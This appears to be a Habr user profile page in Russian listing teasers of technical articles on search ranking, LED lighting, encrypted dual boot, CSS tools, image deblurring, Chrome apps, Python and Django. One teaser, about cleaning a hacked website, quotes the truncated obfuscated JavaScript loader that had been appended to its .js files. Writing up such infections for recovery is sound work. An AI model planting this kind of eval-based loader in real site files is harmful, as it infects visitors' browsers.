Pull to refresh
0
0
Евгений Лойко @MbyteZ

User

Send message

Ранжирование в Яндексе: как поставить машинное обучение на поток (пост #1)

Reading time6 min
Views51K
Сегодня мы начинаем публиковать серию постов о машинном обучении и его месте в Яндексе, а также инструментах, которые избавили разработчиков поисковой системы от рутинных действий и помогли сфокусироваться на главном — изобретении новых подходов к улучшению поиска. Основное внимание мы уделим применению этих средств для улучшения формулы релевантности, и более широко — для качества ранжирования.

image
Читать дальше →

Светодиодная лента в качестве освещения комнаты

Reading time15 min
Views1.3M
Изначально для основного освещения одной из комнат, где шёл капитальный ремонт, планировалась обычная люстра. Но недавно мне на глаза попалась суперяркая светодиодная лента Ultra 5000 со светодиодами smd 5630 торговой марки Arlight. Решение было принято быстро, окончательно и бесповоротно — хочу такую ленту в качестве основного света в комнате.



О реализации светодиодного периметра освещения далее

Установка зашифрованной (TrueCrypt) Windows при Ubuntu по умолчанию

Reading time6 min
Views63K
Нужно: поставить на одну машину одновременно Windows и Ubuntu таким образом, чтобы нельзя было посмотреть содержимое Windows, не имея пароля. CD-ROM'а нет, USB Only.
Работа с виртуалкой из под Ubuntu не понравилась по многим причинам, основная — существенные проблемы производительности.
Решено: ставить параллельно 2 операционки (Windows & Ubuntu) таким образом, что по умолчанию грузится Ubuntu, а Windows размещается на загрузочном разделе.
Читать дальше →

Новое для веб-дизайнера за ноябрь 2012

Reading time1 min
Views57K
Продолжаю подборку новых полезных штук для веб-дизайнера за прошедший месяц. Прошлые выпуски: октябрь, сентябрь.

Сервисы и инструменты


Photo Raster — новый мощный графический редактор онлайн.

Читать дальше →

Онлайн-инструменты для кодеров

Reading time2 min
Views286K
Онлайн-сервисы становятся все популярнее, постепенно усложняя функционал и улучшая интерфейсы. В этой подборке представлены онлайн-инструменты для кодеров.

Cloud9


«Это Google Docs, только для кода» — так говорят о проекте. Облачный сервис вырос из Mozilla Bespin. Основные фишки: SSH, drag-and-drop и возможность разработки оффлайн.

Читать дальше →

Подборка генераторов CSS

Reading time2 min
Views50K


Не секрет, что писать CSS для многих стандартных кнопок, макетов, etc. бывает весьма лениво. Ниже представлена подборка генераторов CSS (и не только), которая, возможно, в некоторых случаях сможет упростить кому-то жизнь. Многими генераторами можно успешно пользоваться даже без глубоких познаний CSS.

(Осторожно! Много картинок)
Читать дальше →

Письма для ваших приложений (за 24-часа)

Reading time3 min
Views4.1K
Всем привет. Большую часть времени я занимаюсь управлением разработкой проектов shopium.ua и zakaz.ua, но инженер внутри меня периодически требует развлечений. Не имея свободного времени на хакатоны, гаражи, стартап-сауны и прочее, я придумал себе свой формат «покодить чего душа пожелает»:
  • нужен мне самому
  • время на реализацию MVP — до 24х часов в сумме
  • бюджет — до $100
  • коммерческий потенциал


В наших проектах мы шлём пользователям письма. Мы шлём пользователям информационные рассылки, и с этим прекрасно справляется MailChimp, но ниша отсылки транзакционных писем (подтверждения, уведомления и т.д.) до недавнего времени была относительно пуста.

В большинстве проектов, которые я знаю, транзакционные письма прямо в коде создаются из шаблона письма (и хорошо если он вынесен в отдельные файл, а не зашит рядом в коде), и передаются локальному SMTP серверу. И при этом:
  • менять текст сообщений могут только программисты (это медленно и дорого, и при этом невозможно делегировать работу с текстами контент-менеджеру, а для любого изменения текста писем нужен редеплой системы)
  • не отслеживается открытие писем и клики по ссылкам (нет данных для улучшения текста письма)
  • не обрабатываются bounce (можно постоянно слать письма на несуществующие адреса, а это влияет на показатель «спамности» адреса, с которого шлются письма)
  • лишь у некоторых реализована подпись писем через DKIM (тоже уменьшает шансы на доставку письма в inbox)


Я решил за 24 часа сделать сервис, с помощью которого можно будет надёжно слать красивые письма, быстро менять их текст, и отслеживать статистику. Встречайте Notifout.
Читать дальше →

Публичные выступления. Что? Как? Зачем?

Reading time5 min
Views60K
Доброго времени суток, хабролюди!

Ценность умения публично выступать сложно переоценить, но многие обходят сторонной вопросы ораторского искусства. А потом удивляются, почему их не слушают, а если и слушают, то не заинтересовываются темой. Если вам хочется научиться общаться с аудиторией, если вы хотите узнать немного больше об ораторском искусстве, то добро пожаловать под кат.
Читать дальше →

Восстановление расфокусированных и смазанных изображений. Практика

Reading time10 min
Views358K
Не так давно я опубликовал на хабре первую часть статьи по восстановлению расфокусированных и смазанных изображений, где описывалась теоретическая часть. Эта тема, судя по комментариям, вызвала немало интереса и я решил продолжить это направление и показать вам какие же проблемы появляются при практической реализации казалось бы простых формул.

В дополнение к этому я написал демонстрационную программу, в которой реализованы основные алгоритмы по устранению расфокусировки и смаза. Программа выложена на GitHub вместе с исходниками и дистрибутивами.

Ниже показан результат обработки реального размытого изображения (не с синтетическим размытием). Исходное изображение было получено камерой Canon 500D с объективом EF 85mm/1.8. Фокусировка была выставлена вручную, чтобы получить размытие. Как видно, текст совершенно не читается, лишь угадывается диалоговое окно Windows 7.



И вот результат обработки:



Практически весь текст читается достаточно хорошо, хотя и появились некоторые характерные искажения.

Под катом подробное описание проблем деконволюции, способов их решения, а также множество примеров и сравнений. Осторожно, много картинок!
Читать дальше →

Плагин, конвертирующий стили фотошопа в код css

Reading time1 min
Views39K
Неужели у кого-то было время этим запариться!

css3ps.com

Работает как вебсервис, от того время ожидания результата работы 30 секунд.

1) Качаем плагин под нужную версию фотошопа, открываем через windows->extensions->css3ps;
2) рисуем шейп, накладываем стили, отправляем на сервер через расширение;
3) ждем 30 секунд, смотрим на результат.

Естественно, сервис разбирает не все, что вы натворили в стилях.
Обратите внимание, что шейп нужно рисовать аккуратно.



Все работает) Фантастика.

Сервис потребительского кредитования онлайн – разбор полетов 9 месяцев спустя

Reading time9 min
Views15K
imageПрошло ни много ни мало 9 месяцев (или, если быть точным, 273 дня) с момента, когда, мы с приятелем, решили взяться за создание сервиса онлайн-кредитования. И как бы мы теперь не роптали на жестокий мир, стоит сразу признаться, что эти 273 дня были вполне интересными и очень поучительными для нас.

Под катом вас ждет откровенный и, надеюсь, нескучный рассказ о том, как простая идея проходит путь от рождения в одной отдельно взятой голове до воплощения в продукт, по моему скромному мнению, вполне имеющий право на жизнь.
А что там может быть интересного?

Краткий обзор корпоративных порталов

Reading time9 min
Views150K

   Наличием корпоративного портала у себя в компании уже никого не удивишь. Все больше крупных и средних представителей бизнеса так или иначе сталкивались с выбором и внедрением портала. И тем не менее, многие предприятия еще стоят на пороге принятия решения о запуске проекта внедрения корпоративного портала. Надеюсь, мой краткий обзор поможет Вам сделать первый шаг в этом направлении.


   Итак, все портальные решения, представленные сегодня на рынке, можно условно разделить на три группы:


  • платформы для создания корпоративных порталов;
  • коробочные продукты (готовые решения) на базе платформ;
  • решения, предлагаемые как SaaS сервис (облачные решения).

   Рассмотрим их последовательно.


Читать дальше →

Mozilla представила проект Webmaker и редактор Thimble

Reading time1 min
Views4.8K
Сегодня в своем блоге Mozilla объявила о запуске проекта Mozilla Webmaker и редактора Thimble.



Thimble (англ. Наперсток) — это новый инструмент, который позволяет всем с невероятной простотой создавать и публиковать свои собственные веб-страницы и другие проекты в считанные минуты.
Thimble упрощает разработку. Это интуитивный визуальный редактор, который позволяет создавать и редактировать HTML прямо в браузере, просматривать и исправлять свои работы, а затем публиковать и делиться полностью функциональными веб-страницами с помощью одного клика. Thimble открывает барьеры для начинающих пользователей, которые начали учиться кодить, и включает в себя ряд стартовых проектов и шаблонов, чтобы помочь практически любому быстро приступить к работе.
Читать дальше →

Новые российские приложения в Google Chrome

Reading time3 min
Views3.5K
Аркадий Хачкованян, менеджер по маркетингу Google Россия, Анатолий Лебедев, менеджер по развитию новых направлений Google EMEA

В декабре 2010 года мы анонсировали запуск интернет-магазина Chrome (Chrome Web Store) — каталог веб-приложений, расширений и тем для браузера Google Chrome. Тогда, три года назад, их были сотни, сегодня — уже десятки тысяч, а количество установок исчисляется миллионами.

Сами по себе веб-приложения — это интерактивные программы, которые запускаются прямо из браузера. Они могут иметь широкий набор функций или выполнять одну конкретную задачу, например, редактировать фотографии. У каждого из них есть своя страница, на которой можно почитать комментарии, посмотреть оценки и оставить свой отзыв. Вы можете устанавливать те из них, которые нужны вам, например, для работы, отдыха или планирования бюджета, а также осуществлять поиск по категориям. Иконка установленного приложения отобразится во вкладках браузера, и вы всегда будете иметь к нему быстрый доступ. А если вы работаете на нескольких компьютерах, то можно синхронизировать все приложения, расширения и темы при помощи функции синхронизации браузера.

У приложений есть и другие преимущества. Например, владельцы сайтов, разрабатывающие приложения для Google Chrome, часто добавляют в них функции недоступные на самом сайте. Некоторые приложения могут работать даже в офлайн режиме: так, Gmail Offline позволит вам читать почту и писать письма даже тогда, когда компьютер не подключен к Интернету.

Количество приложений, разработанных в России, очень быстро растет. Сегодня мы рады поделиться некоторыми новинками, подготовленными известными издателями специально для российских пользователей Google Chrome. Теперь вы можете смотреть кино и телеканалы, играть в Cut the Rope, писать в онлайн-дневник и даже покупать технику. И все это — прямо в окне вашего браузера Chrome!

Cut the Rope (Zeptolab) – одно из самых популярных приложений Google Play – теперь и в Chrome Web Store! Задача проста — игрок должен обрезать веревку и накормить зеленого монстрика по имени Ом Ном.

Россия ТВ – смотреть последние новости в прямом онлайн-эфире можно прямо через браузер Chrome! Онлайн-вещание популярных телеканалов России: Россия 1, Россия 2, Россия 24, Москва 24, Русский Роман и др., а также трансляции ведущих спортивных и культурных событий России и мира, эксклюзивные права на показ которых принадлежат ВГТРК. Уже сейчас через приложение вы можете в прямом эфире телеканалов Россия 1 и Россия 2 смотреть матчи Чемпионата Европы по футболу.

МВидео – приложение от одного из крупнейших российских ритейлеров, которое позволяет искать и сортировать товары по цене, бренду и популярности. Прямо в окне Google Chrome можно найти, в каком магазине есть в наличии интересующий вас товар, и совершить покупку.

LiveInternet.Дневники Offline – приложение предназначено для пользователей сервиса блогов LiveInternet.ru. Помимо стандартных функций, представленных на сайте, приложение для Chrome позволяет упростить внешний вид сообщений и дневников, автоматически предпросматривать сообщения и даже читать записи и комментарии без доступа к Интернету.

Танчики (Alawar) – игра, созданная по мотивам классических аркад Tank Force и Battle City. 55 уровней военного симулятора, в котором можно почувствовать себя командиром танка, не дадут вам скучать!

Easyfinance – следить за своими расходами стало еще проще. Благодаря этому приложению вы сможете получить быстрый доступ к информации по счетам и спланировать бюджет.

Wunderlist – менеджер задач, который поможет вам отследить, какие дела уже выполнены, а к каким самое время приступать. Задачи автоматически синхронизируются с десктопными и мобильными приложениями. Вы также можете делиться ими с друзьями и коллегами.

ВидеоВолна – каталог из более чем 7 тысяч легальных сериалов и передач, мультфильмов и новинок кино. При этом более 90% видеоконтента открыто для бесплатного просмотра. Если же видео закрыто, система предложит вам перейти на сайт правообладателя, где оно будет доступно после оплаты.

Присоединяйтесь к миллионам пользователей Chrome по всему миру и оцените эти и многие другие приложения Chrome Web Store!

Метаклассы в Python

Reading time10 min
Views205K
Как сказал один из пользователей StackOverflow, «using SO is like doing lookups with a hashtable instead of a linked list». Мы снова обращаемся к этому замечательному ресурсу, на котором попадаются чрезвычайно подробные и понятные ответы на самые различные вопросы.

В этот раз мы обсудим, что такое метаклассы, как, где и зачем их использовать, а также почему обычно этого делать не стоит.

Читать дальше →

Упрощая жизнь c Django

Reading time2 min
Views9.9K
За время использования Django я накопил множество небольших инструментов: декораторов, шорткатов, кастомных полей и просто утилит, которые кочевали со мной из проекта в проект в виде сборного пакета handy. В конце концов, я решил поделится своим опытом, потому как такой код — это и есть материализованный опыт (даже лучше — код можно исполнить), и открыть наиболее полезные куски handy для всех желающих.

Пакет направлен на уменьшение необходимого boilerplate при использовании фреймворка джанго. На то, чтобы избавить от необходимости писать одно и то же раз за разом, сделать код короче и выразительней.
Читать дальше →

Лечение сайта от вируса в файлах javascript и других на примере

Reading time3 min
Views8.4K
Однажды, я получил письмо от Яндекс.Вебмастер о том, что один из моих сайтов заражён — Сайт содержит код, который может быть опасен для посетителей и, что В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Быстрый анализ показал, что заражены файлы *.js — в конце каждого из них был добавлен код:

try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54
.... тут ещё много таких же надписей ....
$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}


Проанализировав выдачу поисковика на тему поиска и замены текста в файлах linux, я получил несколько вариантов команд для консоли.

Далее, я зашёл в систему по SSH и от имени root выполнил команду
Читать дальше →

Годное ТЗ, очень коротко

Reading time3 min
Views3.7K
Частенько, по долгу службы в том числе, приходится писать всякие ТЗ, а так же вникать и (командовать) создавать документацию по продуктам и решениям. ТЗ — для отношений с клиентом, документация — для разработчиков. Основные принципы, которые должны быть, коротко, под катом.
Читать дальше →

Information

Rating
Does not participate
Location
Волжский (Волгоградская обл.), Волгоградская обл., Россия
Date of birth
Registered
Activity